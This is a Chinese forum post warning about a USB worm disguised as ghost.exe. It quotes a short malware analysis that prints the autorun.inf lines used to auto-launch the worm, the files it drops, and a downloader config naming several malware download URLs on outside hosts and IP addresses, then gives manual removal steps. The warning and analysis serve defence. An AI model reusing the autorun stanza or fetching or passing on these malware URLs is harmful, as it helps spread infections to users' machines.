BYR Achieve · 镜像论坛

今天刚发现了一个病毒ghost.exe，还不知道怎么感染的，在备份系统的时候突然发现D盘的根目录下多了两个文件：autorun.inf和ghost.exe，autorun.inf内容为：[AutoRun] OPEN=ghost.exe shellexecute=ghost.exe shell\打开(&O)\command=ghost.exe 可见这两个文件是一起的，俺用的ghost文件名为ghost80.exe大小为1M左右，而这个ghost.exe则要小的多，可以判定是病毒，检查各个分区，在根目录下都发现了，搜索了一下，没有在其他地方找到，病毒有什么破坏还不清楚。百渡了一下，找到了一篇文章： http://hi.baidu.com/win98/blog/item/032971cfbff1e43df8dc612f.html 看来应该是一个比较新的病毒了，我的杀毒软件是avast!最新病毒库根本检测不到，病毒伪装成ghost，要注意了，千万不要运行，按照帖子所说的办法处理，我在这里贴出来： ghost.exe U盘病毒的查杀..2006年12月23日星期六 13:41今天吃饭前..接到某位mm 求助..说电脑又中毒了.. 按照习惯先叫他扫个SREng 的 log 看看..意外的发现了个 ghost.exe 和四五个小病毒.. 就跟她拿了 ghost.exe 看看.. 又是一个 U 盘病毒还会下载病毒.. 现在写一点点的小分析 ..目前瑞星不报..在线扫了扫发现就几家报了.. 运行ghost.exe 后.. 生成 ghost.exe.bat(删除自身) C:\WINDOWS\system\conime.exe C:\Program Files\WinRAR\WinRAR.exe.tmp 每个盘符下释放(c d e f g h j k ) autorun.inf ghost.exe autorun.inf 文件内容 [AutoRun] OPEN=ghost.exe shellexecute=ghost.exe shell\打开(&O)\command=ghost.exe 连入 http://www.dj916.com/ie.txt 下载.. ie.txt 内容 [main] 服务文件更新=5 服务文件地址=http://www.86dy.net/c123.exe 下载者是否更新=4 下载个数=7 文件1=http://222.220.16.185/data6/jwm.exe 更新1=6 文件2=http://222.220.16.185/data6/wol.exe 更新2=6 文件3=http://222.220.16.185/data6/wo3.exe 更新3=6 文件4=http://222.220.16.185/data6/mir.exe 更新4=6 文件5=http://222.220.16.185/data6/mhh.exe 更新5=6 文件6=http://222.220.16.181/ienet.exe 更新6=6 文件7=http://222.220.16.185/data6/zt3.exe 更新7=6 这些网址都是下载下来的病毒.. 没写入注册表.. 但是我用反汇编看了看.. 这玩意应该修改了讯雷 QQ WINRAR 的注册表 .. 处理方法(不包括下载下来的病毒) 右键=>打开进入每个盘符=>删除 autorun.inf ghost.exe 删除文件 C:\WINDOWS\system\conime.exe 建议重装 qq 讯雷 WINRAR 最后我还发现个玩意 00407345 MOV EDX,123.004076B4 你好瑞星我喜欢你~ 作者难不成暗恋瑞星??

警惕病毒ghost.exe!